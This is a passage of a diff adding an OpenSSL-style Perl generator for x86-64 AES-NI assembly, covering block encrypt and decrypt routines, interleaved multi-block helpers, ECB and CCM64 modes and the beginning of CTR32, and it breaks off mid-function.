+# this is natural Unix argument order for public $PREFIX_[ecb|cbc]_encrypt ...
+$inp="%rdi";
+$out="%rsi";
+$len="%rdx";
+$key="%rcx";	# input to and changed by aesni_[en|de]cryptN !!!
+$ivp="%r8";	# cbc, ctr, ...
+
+$rnds_="%r10d";	# backup copy for $rounds
+$key_="%r11";	# backup copy for $key
+
+# %xmm register layout
+$rndkey0="%xmm0";	$rndkey1="%xmm1";
+$inout0="%xmm2";	$inout1="%xmm3";
+$inout2="%xmm4";	$inout3="%xmm5";
+$inout4="%xmm6";	$inout5="%xmm7";
+$inout6="%xmm8";	$inout7="%xmm9";
+
+$in2="%xmm6";		$in1="%xmm7";	# used in CBC decrypt, CTR, ...
+$in0="%xmm8";		$iv="%xmm9";
+
+# Inline version of internal aesni_[en|de]crypt1.
+#
+# Why folded loop? Because aes[enc|dec] is slow enough to accommodate
+# cycles which take care of loop variables...
+{ my $sn;
+sub aesni_generate1 {
+my ($p,$key,$rounds,$inout,$ivec)=@_;	$inout=$inout0 if (!defined($inout));
+++$sn;
+$code.=<<___;
+	$movkey	($key),$rndkey0
+	$movkey	16($key),$rndkey1
+___
+$code.=<<___ if (defined($ivec));
+	xorps	$rndkey0,$ivec
+	lea	32($key),$key
+	xorps	$ivec,$inout
+___
+$code.=<<___ if (!defined($ivec));
+	lea	32($key),$key
+	xorps	$rndkey0,$inout
+___
+$code.=<<___;
+.Loop_${p}1_$sn:
+	aes${p}	$rndkey1,$inout
+	dec	$rounds
+	$movkey	($key),$rndkey1
+	lea	16($key),$key
+	jnz	.Loop_${p}1_$sn	# loop body is 16 bytes
+	aes${p}last	$rndkey1,$inout
+___
+}}
+# void $PREFIX_[en|de]crypt (const void *inp,void *out,const AES_KEY *key);
+#
+{ my ($inp,$out,$key) = @_4args;
+
+$code.=<<___;
+.globl	${PREFIX}_encrypt
+.type	${PREFIX}_encrypt,\@abi-omnipotent
+.align	16
+${PREFIX}_encrypt:
+	movups	($inp),$inout0		# load input
+	mov	240($key),$rounds	# key->rounds
+___
+	&aesni_generate1("enc",$key,$rounds);
+$code.=<<___;
+	movups	$inout0,($out)		# output
+	ret
+.size	${PREFIX}_encrypt,.-${PREFIX}_encrypt
+
+.globl	${PREFIX}_decrypt
+.type	${PREFIX}_decrypt,\@abi-omnipotent
+.align	16
+${PREFIX}_decrypt:
+	movups	($inp),$inout0		# load input
+	mov	240($key),$rounds	# key->rounds
+___
+	&aesni_generate1("dec",$key,$rounds);
+$code.=<<___;
+	movups	$inout0,($out)		# output
+	ret
+.size	${PREFIX}_decrypt, .-${PREFIX}_decrypt
+___
+}
+
+# _aesni_[en|de]cryptN are private interfaces, N denotes interleave
+# factor. Why 3x subroutine were originally used in loops? Even though
+# aes[enc|dec] latency was originally 6, it could be scheduled only
+# every *2nd* cycle. Thus 3x interleave was the one providing optimal
+# utilization, i.e. when subroutine's throughput is virtually same as
+# of non-interleaved subroutine [for number of input blocks up to 3].
+# This is why it originally made no sense to implement 2x subroutine.
+# But times change and it became appropriate to spend extra 192 bytes
+# on 2x subroutine on Atom Silvermont account. For processors that
+# can schedule aes[enc|dec] every cycle optimal interleave factor
+# equals to corresponding instructions latency. 8x is optimal for
+# * Bridge and "super-optimal" for other Intel CPUs... 
+
+sub aesni_generate2 {
+my $dir=shift;
+# As already mentioned it takes in $key and $rounds, which are *not*
+# preserved. $inout[0-1] is cipher/clear text...
+$code.=<<___;
+.type	_aesni_${dir}rypt2,\@abi-omnipotent
+.align	16
+_aesni_${dir}rypt2:
+	$movkey	($key),$rndkey0
+	shl	\$4,$rounds
+	$movkey	16($key),$rndkey1
+	xorps	$rndkey0,$inout0
+	xorps	$rndkey0,$inout1
+	$movkey	32($key),$rndkey0
+	lea	32($key,$rounds),$key
+	neg	%rax				# $rounds
+	add	\$16,%rax
+
+.L${dir}_loop2:
+	aes${dir}	$rndkey1,$inout0
+	aes${dir}	$rndkey1,$inout1
+	$movkey		($key,%rax),$rndkey1
+	add		\$32,%rax
+	aes${dir}	$rndkey0,$inout0
+	aes${dir}	$rndkey0,$inout1
+	$movkey		-16($key,%rax),$rndkey0
+	jnz		.L${dir}_loop2
+
+	aes${dir}	$rndkey1,$inout0
+	aes${dir}	$rndkey1,$inout1
+	aes${dir}last	$rndkey0,$inout0
+	aes${dir}last	$rndkey0,$inout1
+	ret
+.size	_aesni_${dir}rypt2,.-_aesni_${dir}rypt2
+___
+}
+sub aesni_generate3 {
+my $dir=shift;
+# As already mentioned it takes in $key and $rounds, which are *not*
+# preserved. $inout[0-2] is cipher/clear text...
+$code.=<<___;
+.type	_aesni_${dir}rypt3,\@abi-omnipotent
+.align	16
+_aesni_${dir}rypt3:
+	$movkey	($key),$rndkey0
+	shl	\$4,$rounds
+	$movkey	16($key),$rndkey1
+	xorps	$rndkey0,$inout0
+	xorps	$rndkey0,$inout1
+	xorps	$rndkey0,$inout2
+	$movkey	32($key),$rndkey0
+	lea	32($key,$rounds),$key
+	neg	%rax				# $rounds
+	add	\$16,%rax
+
+.L${dir}_loop3:
+	aes${dir}	$rndkey1,$inout0
+	aes${dir}	$rndkey1,$inout1
+	aes${dir}	$rndkey1,$inout2
+	$movkey		($key,%rax),$rndkey1
+	add		\$32,%rax
+	aes${dir}	$rndkey0,$inout0
+	aes${dir}	$rndkey0,$inout1
+	aes${dir}	$rndkey0,$inout2
+	$movkey		-16($key,%rax),$rndkey0
+	jnz		.L${dir}_loop3
+
+	aes${dir}	$rndkey1,$inout0
+	aes${dir}	$rndkey1,$inout1
+	aes${dir}	$rndkey1,$inout2
+	aes${dir}last	$rndkey0,$inout0
+	aes${dir}last	$rndkey0,$inout1
+	aes${dir}last	$rndkey0,$inout2
+	ret
+.size	_aesni_${dir}rypt3,.-_aesni_${dir}rypt3
+___
+}
+# 4x interleave is implemented to improve small block performance,
+# most notably [and naturally] 4 block by ~30%. One can argue that one
+# should have implemented 5x as well, but improvement would be <20%,
+# so it's not worth it...
+sub aesni_generate4 {
+my $dir=shift;
+# As already mentioned it takes in $key and $rounds, which are *not*
+# preserved. $inout[0-3] is cipher/clear text...
+$code.=<<___;
+.type	_aesni_${dir}rypt4,\@abi-omnipotent
+.align	16
+_aesni_${dir}rypt4:
+	$movkey	($key),$rndkey0
+	shl	\$4,$rounds
+	$movkey	16($key),$rndkey1
+	xorps	$rndkey0,$inout0
+	xorps	$rndkey0,$inout1
+	xorps	$rndkey0,$inout2
+	xorps	$rndkey0,$inout3
+	$movkey	32($key),$rndkey0
+	lea	32($key,$rounds),$key
+	neg	%rax				# $rounds
+	.byte	0x0f,0x1f,0x00
+	add	\$16,%rax
+
+.L${dir}_loop4:
+	aes${dir}	$rndkey1,$inout0
+	aes${dir}	$rndkey1,$inout1
+	aes${dir}	$rndkey1,$inout2
+	aes${dir}	$rndkey1,$inout3
+	$movkey		($key,%rax),$rndkey1
+	add		\$32,%rax
+	aes${dir}	$rndkey0,$inout0
+	aes${dir}	$rndkey0,$inout1
+	aes${dir}	$rndkey0,$inout2
+	aes${dir}	$rndkey0,$inout3
+	$movkey		-16($key,%rax),$rndkey0
+	jnz		.L${dir}_loop4
+
+	aes${dir}	$rndkey1,$inout0
+	aes${dir}	$rndkey1,$inout1
+	aes${dir}	$rndkey1,$inout2
+	aes${dir}	$rndkey1,$inout3
+	aes${dir}last	$rndkey0,$inout0
+	aes${dir}last	$rndkey0,$inout1
+	aes${dir}last	$rndkey0,$inout2
+	aes${dir}last	$rndkey0,$inout3
+	ret
+.size	_aesni_${dir}rypt4,.-_aesni_${dir}rypt4
+___
+}
+sub aesni_generate6 {
+my $dir=shift;
+# As already mentioned it takes in $key and $rounds, which are *not*
+# preserved. $inout[0-5] is cipher/clear text...
+$code.=<<___;
+.type	_aesni_${dir}rypt6,\@abi-omnipotent
+.align	16
+_aesni_${dir}rypt6:
+	$movkey		($key),$rndkey0
+	shl		\$4,$rounds
+	$movkey		16($key),$rndkey1
+	xorps		$rndkey0,$inout0
+	pxor		$rndkey0,$inout1
+	pxor		$rndkey0,$inout2
+	aes${dir}	$rndkey1,$inout0
+	lea		32($key,$rounds),$key
+	neg		%rax			# $rounds
+	aes${dir}	$rndkey1,$inout1
+	pxor		$rndkey0,$inout3
+	pxor		$rndkey0,$inout4
+	aes${dir}	$rndkey1,$inout2
+	pxor		$rndkey0,$inout5
+	add		\$16,%rax
+	aes${dir}	$rndkey1,$inout3
+	aes${dir}	$rndkey1,$inout4
+	aes${dir}	$rndkey1,$inout5
+	$movkey		-16($key,%rax),$rndkey0
+	jmp		.L${dir}_loop6_enter
+.align	16
+.L${dir}_loop6:
+	aes${dir}	$rndkey1,$inout0
+	aes${dir}	$rndkey1,$inout1
+	aes${dir}	$rndkey1,$inout2
+	aes${dir}	$rndkey1,$inout3
+	aes${dir}	$rndkey1,$inout4
+	aes${dir}	$rndkey1,$inout5
+.L${dir}_loop6_enter:
+	$movkey		($key,%rax),$rndkey1
+	add		\$32,%rax
+	aes${dir}	$rndkey0,$inout0
+	aes${dir}	$rndkey0,$inout1
+	aes${dir}	$rndkey0,$inout2
+	aes${dir}	$rndkey0,$inout3
+	aes${dir}	$rndkey0,$inout4
+	aes${dir}	$rndkey0,$inout5
+	$movkey		-16($key,%rax),$rndkey0
+	jnz		.L${dir}_loop6
+
+	aes${dir}	$rndkey1,$inout0
+	aes${dir}	$rndkey1,$inout1
+	aes${dir}	$rndkey1,$inout2
+	aes${dir}	$rndkey1,$inout3
+	aes${dir}	$rndkey1,$inout4
+	aes${dir}	$rndkey1,$inout5
+	aes${dir}last	$rndkey0,$inout0
+	aes${dir}last	$rndkey0,$inout1
+	aes${dir}last	$rndkey0,$inout2
+	aes${dir}last	$rndkey0,$inout3
+	aes${dir}last	$rndkey0,$inout4
+	aes${dir}last	$rndkey0,$inout5
+	ret
+.size	_aesni_${dir}rypt6,.-_aesni_${dir}rypt6
+___
+}
+sub aesni_generate8 {
+my $dir=shift;
+# As already mentioned it takes in $key and $rounds, which are *not*
+# preserved. $inout[0-7] is cipher/clear text...
+$code.=<<___;
+.type	_aesni_${dir}rypt8,\@abi-omnipotent
+.align	16
+_aesni_${dir}rypt8:
+	$movkey		($key),$rndkey0
+	shl		\$4,$rounds
+	$movkey		16($key),$rndkey1
+	xorps		$rndkey0,$inout0
+	xorps		$rndkey0,$inout1
+	pxor		$rndkey0,$inout2
+	pxor		$rndkey0,$inout3
+	pxor		$rndkey0,$inout4
+	lea		32($key,$rounds),$key
+	neg		%rax			# $rounds
+	aes${dir}	$rndkey1,$inout0
+	add		\$16,%rax
+	pxor		$rndkey0,$inout5
+	aes${dir}	$rndkey1,$inout1
+	pxor		$rndkey0,$inout6
+	pxor		$rndkey0,$inout7
+	aes${dir}	$rndkey1,$inout2
+	aes${dir}	$rndkey1,$inout3
+	aes${dir}	$rndkey1,$inout4
+	aes${dir}	$rndkey1,$inout5
+	aes${dir}	$rndkey1,$inout6
+	aes${dir}	$rndkey1,$inout7
+	$movkey		-16($key,%rax),$rndkey0
+	jmp		.L${dir}_loop8_enter
+.align	16
+.L${dir}_loop8:
+	aes${dir}	$rndkey1,$inout0
+	aes${dir}	$rndkey1,$inout1
+	aes${dir}	$rndkey1,$inout2
+	aes${dir}	$rndkey1,$inout3
+	aes${dir}	$rndkey1,$inout4
+	aes${dir}	$rndkey1,$inout5
+	aes${dir}	$rndkey1,$inout6
+	aes${dir}	$rndkey1,$inout7
+.L${dir}_loop8_enter:
+	$movkey		($key,%rax),$rndkey1
+	add		\$32,%rax
+	aes${dir}	$rndkey0,$inout0
+	aes${dir}	$rndkey0,$inout1
+	aes${dir}	$rndkey0,$inout2
+	aes${dir}	$rndkey0,$inout3
+	aes${dir}	$rndkey0,$inout4
+	aes${dir}	$rndkey0,$inout5
+	aes${dir}	$rndkey0,$inout6
+	aes${dir}	$rndkey0,$inout7
+	$movkey		-16($key,%rax),$rndkey0
+	jnz		.L${dir}_loop8
+
+	aes${dir}	$rndkey1,$inout0
+	aes${dir}	$rndkey1,$inout1
+	aes${dir}	$rndkey1,$inout2
+	aes${dir}	$rndkey1,$inout3
+	aes${dir}	$rndkey1,$inout4
+	aes${dir}	$rndkey1,$inout5
+	aes${dir}	$rndkey1,$inout6
+	aes${dir}	$rndkey1,$inout7
+	aes${dir}last	$rndkey0,$inout0
+	aes${dir}last	$rndkey0,$inout1
+	aes${dir}last	$rndkey0,$inout2
+	aes${dir}last	$rndkey0,$inout3
+	aes${dir}last	$rndkey0,$inout4
+	aes${dir}last	$rndkey0,$inout5
+	aes${dir}last	$rndkey0,$inout6
+	aes${dir}last	$rndkey0,$inout7
+	ret
+.size	_aesni_${dir}rypt8,.-_aesni_${dir}rypt8
+___
+}
+&aesni_generate2("enc") if ($PREFIX eq "aesni");
+&aesni_generate2("dec");
+&aesni_generate3("enc") if ($PREFIX eq "aesni");
+&aesni_generate3("dec");
+&aesni_generate4("enc") if ($PREFIX eq "aesni");
+&aesni_generate4("dec");
+&aesni_generate6("enc") if ($PREFIX eq "aesni");
+&aesni_generate6("dec");
+&aesni_generate8("enc") if ($PREFIX eq "aesni");
+&aesni_generate8("dec");
+
+if ($PREFIX eq "aesni") {
+########################################################################
+# void aesni_ecb_encrypt (const void *in, void *out,
+#			  size_t length, const AES_KEY *key,
+#			  int enc);
+$code.=<<___;
+.globl	aesni_ecb_encrypt
+.type	aesni_ecb_encrypt,\@function,5
+.align	16
+aesni_ecb_encrypt:
+___
+$code.=<<___ if ($win64);
+	lea	-0x58(%rsp),%rsp
+	movaps	%xmm6,(%rsp)
+	movaps	%xmm7,0x10(%rsp)
+	movaps	%xmm8,0x20(%rsp)
+	movaps	%xmm9,0x30(%rsp)
+.Lecb_enc_body:
+___
+$code.=<<___;
+	and	\$-16,$len
+	jz	.Lecb_ret
+
+	mov	240($key),$rounds	# key->rounds
+	$movkey	($key),$rndkey0
+	mov	$key,$key_		# backup $key
+	mov	$rounds,$rnds_		# backup $rounds
+	test	%r8d,%r8d		# 5th argument
+	jz	.Lecb_decrypt
+#--------------------------- ECB ENCRYPT ------------------------------#
+	cmp	\$0x80,$len
+	jb	.Lecb_enc_tail
+
+	movdqu	($inp),$inout0
+	movdqu	0x10($inp),$inout1
+	movdqu	0x20($inp),$inout2
+	movdqu	0x30($inp),$inout3
+	movdqu	0x40($inp),$inout4
+	movdqu	0x50($inp),$inout5
+	movdqu	0x60($inp),$inout6
+	movdqu	0x70($inp),$inout7
+	lea	0x80($inp),$inp
+	sub	\$0x80,$len
+	jmp	.Lecb_enc_loop8_enter
+.align 16
+.Lecb_enc_loop8:
+	movups	$inout0,($out)
+	mov	$key_,$key		# restore $key
+	movdqu	($inp),$inout0
+	mov	$rnds_,$rounds		# restore $rounds
+	movups	$inout1,0x10($out)
+	movdqu	0x10($inp),$inout1
+	movups	$inout2,0x20($out)
+	movdqu	0x20($inp),$inout2
+	movups	$inout3,0x30($out)
+	movdqu	0x30($inp),$inout3
+	movups	$inout4,0x40($out)
+	movdqu	0x40($inp),$inout4
+	movups	$inout5,0x50($out)
+	movdqu	0x50($inp),$inout5
+	movups	$inout6,0x60($out)
+	movdqu	0x60($inp),$inout6
+	movups	$inout7,0x70($out)
+	lea	0x80($out),$out
+	movdqu	0x70($inp),$inout7
+	lea	0x80($inp),$inp
+.Lecb_enc_loop8_enter:
+
+	call	_aesni_encrypt8
+
+	sub	\$0x80,$len
+	jnc	.Lecb_enc_loop8
+
+	movups	$inout0,($out)
+	mov	$key_,$key		# restore $key
+	movups	$inout1,0x10($out)
+	mov	$rnds_,$rounds		# restore $rounds
+	movups	$inout2,0x20($out)
+	movups	$inout3,0x30($out)
+	movups	$inout4,0x40($out)
+	movups	$inout5,0x50($out)
+	movups	$inout6,0x60($out)
+	movups	$inout7,0x70($out)
+	lea	0x80($out),$out
+	add	\$0x80,$len
+	jz	.Lecb_ret
+
+.Lecb_enc_tail:
+	movups	($inp),$inout0
+	cmp	\$0x20,$len
+	jb	.Lecb_enc_one
+	movups	0x10($inp),$inout1
+	je	.Lecb_enc_two
+	movups	0x20($inp),$inout2
+	cmp	\$0x40,$len
+	jb	.Lecb_enc_three
+	movups	0x30($inp),$inout3
+	je	.Lecb_enc_four
+	movups	0x40($inp),$inout4
+	cmp	\$0x60,$len
+	jb	.Lecb_enc_five
+	movups	0x50($inp),$inout5
+	je	.Lecb_enc_six
+	movdqu	0x60($inp),$inout6
+	call	_aesni_encrypt8
+	movups	$inout0,($out)
+	movups	$inout1,0x10($out)
+	movups	$inout2,0x20($out)
+	movups	$inout3,0x30($out)
+	movups	$inout4,0x40($out)
+	movups	$inout5,0x50($out)
+	movups	$inout6,0x60($out)
+	jmp	.Lecb_ret
+.align	16
+.Lecb_enc_one:
+___
+	&aesni_generate1("enc",$key,$rounds);
+$code.=<<___;
+	movups	$inout0,($out)
+	jmp	.Lecb_ret
+.align	16
+.Lecb_enc_two:
+	call	_aesni_encrypt2
+	movups	$inout0,($out)
+	movups	$inout1,0x10($out)
+	jmp	.Lecb_ret
+.align	16
+.Lecb_enc_three:
+	call	_aesni_encrypt3
+	movups	$inout0,($out)
+	movups	$inout1,0x10($out)
+	movups	$inout2,0x20($out)
+	jmp	.Lecb_ret
+.align	16
+.Lecb_enc_four:
+	call	_aesni_encrypt4
+	movups	$inout0,($out)
+	movups	$inout1,0x10($out)
+	movups	$inout2,0x20($out)
+	movups	$inout3,0x30($out)
+	jmp	.Lecb_ret
+.align	16
+.Lecb_enc_five:
+	xorps	$inout5,$inout5
+	call	_aesni_encrypt6
+	movups	$inout0,($out)
+	movups	$inout1,0x10($out)
+	movups	$inout2,0x20($out)
+	movups	$inout3,0x30($out)
+	movups	$inout4,0x40($out)
+	jmp	.Lecb_ret
+.align	16
+.Lecb_enc_six:
+	call	_aesni_encrypt6
+	movups	$inout0,($out)
+	movups	$inout1,0x10($out)
+	movups	$inout2,0x20($out)
+	movups	$inout3,0x30($out)
+	movups	$inout4,0x40($out)
+	movups	$inout5,0x50($out)
+	jmp	.Lecb_ret
+#--------------------------- ECB DECRYPT ------------------------------#
+.align	16
+.Lecb_decrypt:
+	cmp	\$0x80,$len
+	jb	.Lecb_dec_tail
+
+	movdqu	($inp),$inout0
+	movdqu	0x10($inp),$inout1
+	movdqu	0x20($inp),$inout2
+	movdqu	0x30($inp),$inout3
+	movdqu	0x40($inp),$inout4
+	movdqu	0x50($inp),$inout5
+	movdqu	0x60($inp),$inout6
+	movdqu	0x70($inp),$inout7
+	lea	0x80($inp),$inp
+	sub	\$0x80,$len
+	jmp	.Lecb_dec_loop8_enter
+.align 16
+.Lecb_dec_loop8:
+	movups	$inout0,($out)
+	mov	$key_,$key		# restore $key
+	movdqu	($inp),$inout0
+	mov	$rnds_,$rounds		# restore $rounds
+	movups	$inout1,0x10($out)
+	movdqu	0x10($inp),$inout1
+	movups	$inout2,0x20($out)
+	movdqu	0x20($inp),$inout2
+	movups	$inout3,0x30($out)
+	movdqu	0x30($inp),$inout3
+	movups	$inout4,0x40($out)
+	movdqu	0x40($inp),$inout4
+	movups	$inout5,0x50($out)
+	movdqu	0x50($inp),$inout5
+	movups	$inout6,0x60($out)
+	movdqu	0x60($inp),$inout6
+	movups	$inout7,0x70($out)
+	lea	0x80($out),$out
+	movdqu	0x70($inp),$inout7
+	lea	0x80($inp),$inp
+.Lecb_dec_loop8_enter:
+
+	call	_aesni_decrypt8
+
+	$movkey	($key_),$rndkey0
+	sub	\$0x80,$len
+	jnc	.Lecb_dec_loop8
+
+	movups	$inout0,($out)
+	mov	$key_,$key		# restore $key
+	movups	$inout1,0x10($out)
+	mov	$rnds_,$rounds		# restore $rounds
+	movups	$inout2,0x20($out)
+	movups	$inout3,0x30($out)
+	movups	$inout4,0x40($out)
+	movups	$inout5,0x50($out)
+	movups	$inout6,0x60($out)
+	movups	$inout7,0x70($out)
+	lea	0x80($out),$out
+	add	\$0x80,$len
+	jz	.Lecb_ret
+
+.Lecb_dec_tail:
+	movups	($inp),$inout0
+	cmp	\$0x20,$len
+	jb	.Lecb_dec_one
+	movups	0x10($inp),$inout1
+	je	.Lecb_dec_two
+	movups	0x20($inp),$inout2
+	cmp	\$0x40,$len
+	jb	.Lecb_dec_three
+	movups	0x30($inp),$inout3
+	je	.Lecb_dec_four
+	movups	0x40($inp),$inout4
+	cmp	\$0x60,$len
+	jb	.Lecb_dec_five
+	movups	0x50($inp),$inout5
+	je	.Lecb_dec_six
+	movups	0x60($inp),$inout6
+	$movkey	($key),$rndkey0
+	call	_aesni_decrypt8
+	movups	$inout0,($out)
+	movups	$inout1,0x10($out)
+	movups	$inout2,0x20($out)
+	movups	$inout3,0x30($out)
+	movups	$inout4,0x40($out)
+	movups	$inout5,0x50($out)
+	movups	$inout6,0x60($out)
+	jmp	.Lecb_ret
+.align	16
+.Lecb_dec_one:
+___
+	&aesni_generate1("dec",$key,$rounds);
+$code.=<<___;
+	movups	$inout0,($out)
+	jmp	.Lecb_ret
+.align	16
+.Lecb_dec_two:
+	call	_aesni_decrypt2
+	movups	$inout0,($out)
+	movups	$inout1,0x10($out)
+	jmp	.Lecb_ret
+.align	16
+.Lecb_dec_three:
+	call	_aesni_decrypt3
+	movups	$inout0,($out)
+	movups	$inout1,0x10($out)
+	movups	$inout2,0x20($out)
+	jmp	.Lecb_ret
+.align	16
+.Lecb_dec_four:
+	call	_aesni_decrypt4
+	movups	$inout0,($out)
+	movups	$inout1,0x10($out)
+	movups	$inout2,0x20($out)
+	movups	$inout3,0x30($out)
+	jmp	.Lecb_ret
+.align	16
+.Lecb_dec_five:
+	xorps	$inout5,$inout5
+	call	_aesni_decrypt6
+	movups	$inout0,($out)
+	movups	$inout1,0x10($out)
+	movups	$inout2,0x20($out)
+	movups	$inout3,0x30($out)
+	movups	$inout4,0x40($out)
+	jmp	.Lecb_ret
+.align	16
+.Lecb_dec_six:
+	call	_aesni_decrypt6
+	movups	$inout0,($out)
+	movups	$inout1,0x10($out)
+	movups	$inout2,0x20($out)
+	movups	$inout3,0x30($out)
+	movups	$inout4,0x40($out)
+	movups	$inout5,0x50($out)
+
+.Lecb_ret:
+___
+$code.=<<___ if ($win64);
+	movaps	(%rsp),%xmm6
+	movaps	0x10(%rsp),%xmm7
+	movaps	0x20(%rsp),%xmm8
+	movaps	0x30(%rsp),%xmm9
+	lea	0x58(%rsp),%rsp
+.Lecb_enc_ret:
+___
+$code.=<<___;
+	ret
+.size	aesni_ecb_encrypt,.-aesni_ecb_encrypt
+___
+
+{
+######################################################################
+# void aesni_ccm64_[en|de]crypt_blocks (const void *in, void *out,
+#                         size_t blocks, const AES_KEY *key,
+#                         const char *ivec,char *cmac);
+#
+# Handles only complete blocks, operates on 64-bit counter and
+# does not update *ivec! Nor does it finalize CMAC value
+# (see engine/eng_aesni.c for details)
+#
+{
+my $cmac="%r9";	# 6th argument
+
+my $increment="%xmm9";
+my $iv="%xmm6";
+my $bswap_mask="%xmm7";
+
+$code.=<<___;
+.globl	aesni_ccm64_encrypt_blocks
+.type	aesni_ccm64_encrypt_blocks,\@function,6
+.align	16
+aesni_ccm64_encrypt_blocks:
+___
+$code.=<<___ if ($win64);
+	lea	-0x58(%rsp),%rsp
+	movaps	%xmm6,(%rsp)
+	movaps	%xmm7,0x10(%rsp)
+	movaps	%xmm8,0x20(%rsp)
+	movaps	%xmm9,0x30(%rsp)
+.Lccm64_enc_body:
+___
+$code.=<<___;
+	mov	240($key),$rounds		# key->rounds
+	movdqu	($ivp),$iv
+	movdqa	.Lincrement64(%rip),$increment
+	movdqa	.Lbswap_mask(%rip),$bswap_mask
+
+	shl	\$4,$rounds
+	mov	\$16,$rnds_
+	lea	0($key),$key_
+	movdqu	($cmac),$inout1
+	movdqa	$iv,$inout0
+	lea	32($key,$rounds),$key		# end of key schedule
+	pshufb	$bswap_mask,$iv
+	sub	%rax,%r10			# twisted $rounds
+	jmp	.Lccm64_enc_outer
+.align	16
+.Lccm64_enc_outer:
+	$movkey	($key_),$rndkey0
+	mov	%r10,%rax
+	movups	($inp),$in0			# load inp
+
+	xorps	$rndkey0,$inout0		# counter
+	$movkey	16($key_),$rndkey1
+	xorps	$in0,$rndkey0
+	xorps	$rndkey0,$inout1		# cmac^=inp
+	$movkey	32($key_),$rndkey0
+
+.Lccm64_enc2_loop:
+	aesenc	$rndkey1,$inout0
+	aesenc	$rndkey1,$inout1
+	$movkey	($key,%rax),$rndkey1
+	add	\$32,%rax
+	aesenc	$rndkey0,$inout0
+	aesenc	$rndkey0,$inout1
+	$movkey	-16($key,%rax),$rndkey0
+	jnz	.Lccm64_enc2_loop
+	aesenc	$rndkey1,$inout0
+	aesenc	$rndkey1,$inout1
+	paddq	$increment,$iv
+	dec	$len
+	aesenclast	$rndkey0,$inout0
+	aesenclast	$rndkey0,$inout1
+
+	lea	16($inp),$inp
+	xorps	$inout0,$in0			# inp ^= E(iv)
+	movdqa	$iv,$inout0
+	movups	$in0,($out)			# save output
+	pshufb	$bswap_mask,$inout0
+	lea	16($out),$out
+	jnz	.Lccm64_enc_outer
+
+	movups	$inout1,($cmac)
+___
+$code.=<<___ if ($win64);
+	movaps	(%rsp),%xmm6
+	movaps	0x10(%rsp),%xmm7
+	movaps	0x20(%rsp),%xmm8
+	movaps	0x30(%rsp),%xmm9
+	lea	0x58(%rsp),%rsp
+.Lccm64_enc_ret:
+___
+$code.=<<___;
+	ret
+.size	aesni_ccm64_encrypt_blocks,.-aesni_ccm64_encrypt_blocks
+___
+######################################################################
+$code.=<<___;
+.globl	aesni_ccm64_decrypt_blocks
+.type	aesni_ccm64_decrypt_blocks,\@function,6
+.align	16
+aesni_ccm64_decrypt_blocks:
+___
+$code.=<<___ if ($win64);
+	lea	-0x58(%rsp),%rsp
+	movaps	%xmm6,(%rsp)
+	movaps	%xmm7,0x10(%rsp)
+	movaps	%xmm8,0x20(%rsp)
+	movaps	%xmm9,0x30(%rsp)
+.Lccm64_dec_body:
+___
+$code.=<<___;
+	mov	240($key),$rounds		# key->rounds
+	movups	($ivp),$iv
+	movdqu	($cmac),$inout1
+	movdqa	.Lincrement64(%rip),$increment
+	movdqa	.Lbswap_mask(%rip),$bswap_mask
+
+	movaps	$iv,$inout0
+	mov	$rounds,$rnds_
+	mov	$key,$key_
+	pshufb	$bswap_mask,$iv
+___
+	&aesni_generate1("enc",$key,$rounds);
+$code.=<<___;
+	shl	\$4,$rnds_
+	mov	\$16,$rounds
+	movups	($inp),$in0			# load inp
+	paddq	$increment,$iv
+	lea	16($inp),$inp
+	sub	%r10,%rax			# twisted $rounds
+	lea	32($key_,$rnds_),$key		# end of key schedule
+	mov	%rax,%r10
+	jmp	.Lccm64_dec_outer
+.align	16
+.Lccm64_dec_outer:
+	xorps	$inout0,$in0			# inp ^= E(iv)
+	movdqa	$iv,$inout0
+	movups	$in0,($out)			# save output
+	lea	16($out),$out
+	pshufb	$bswap_mask,$inout0
+
+	sub	\$1,$len
+	jz	.Lccm64_dec_break
+
+	$movkey	($key_),$rndkey0
+	mov	%r10,%rax
+	$movkey	16($key_),$rndkey1
+	xorps	$rndkey0,$in0
+	xorps	$rndkey0,$inout0
+	xorps	$in0,$inout1			# cmac^=out
+	$movkey	32($key_),$rndkey0
+	jmp	.Lccm64_dec2_loop
+.align	16
+.Lccm64_dec2_loop:
+	aesenc	$rndkey1,$inout0
+	aesenc	$rndkey1,$inout1
+	$movkey	($key,%rax),$rndkey1
+	add	\$32,%rax
+	aesenc	$rndkey0,$inout0
+	aesenc	$rndkey0,$inout1
+	$movkey	-16($key,%rax),$rndkey0
+	jnz	.Lccm64_dec2_loop
+	movups	($inp),$in0			# load inp
+	paddq	$increment,$iv
+	aesenc	$rndkey1,$inout0
+	aesenc	$rndkey1,$inout1
+	aesenclast	$rndkey0,$inout0
+	aesenclast	$rndkey0,$inout1
+	lea	16($inp),$inp
+	jmp	.Lccm64_dec_outer
+
+.align	16
+.Lccm64_dec_break:
+	#xorps	$in0,$inout1			# cmac^=out
+	mov	240($key_),$rounds
+___
+	&aesni_generate1("enc",$key_,$rounds,$inout1,$in0);
+$code.=<<___;
+	movups	$inout1,($cmac)
+___
+$code.=<<___ if ($win64);
+	movaps	(%rsp),%xmm6
+	movaps	0x10(%rsp),%xmm7
+	movaps	0x20(%rsp),%xmm8
+	movaps	0x30(%rsp),%xmm9
+	lea	0x58(%rsp),%rsp
+.Lccm64_dec_ret:
+___
+$code.=<<___;
+	ret
+.size	aesni_ccm64_decrypt_blocks,.-aesni_ccm64_decrypt_blocks
+___
+}
+######################################################################
+# void aesni_ctr32_encrypt_blocks (const void *in, void *out,
+#                         size_t blocks, const AES_KEY *key,
+#                         const char *ivec);
+#
+# Handles only complete blocks, operates on 32-bit counter and
+# does not update *ivec! (see crypto/modes/ctr128.c for details)
+#
+# Overhaul based on suggestions from Shay Gueron and Vlad Krasnov,
+# http://rt.openssl.org/Ticket/Display.html?id=3021&user=guest&pass=guest.
+# Keywords are full unroll and modulo-schedule counter calculations
+# with zero-round key xor.
+{
+my ($in0,$in1,$in2,$in3,$in4,$in5)=map("%xmm$_",(10..15));
+my ($key0,$ctr)=("${key_}d","${ivp}d");
+my $frame_size = 0x80 + ($win64?160:0);
+
+$code.=<<___;
+.globl	aesni_ctr32_encrypt_blocks
+.type	aesni_ctr32_encrypt_blocks,\@function,5
+.align	16
+aesni_ctr32_encrypt_blocks:
+	lea	(%rsp),%rax
+	push	%rbp
+	sub	\$$frame_size,%rsp
+	and	\$-16,%rsp	# Linux kernel stack can be incorrectly seeded
+___
+$code.=<<___ if ($win64);
+	movaps	%xmm6,-0xa8(%rax)
+	movaps	%xmm7,-0x98(%rax)
+	movaps	%xmm8,-0x88(%rax)
+	movaps	%xmm9,-0x78(%rax)
+	movaps	%xmm10,-0x68(%rax)
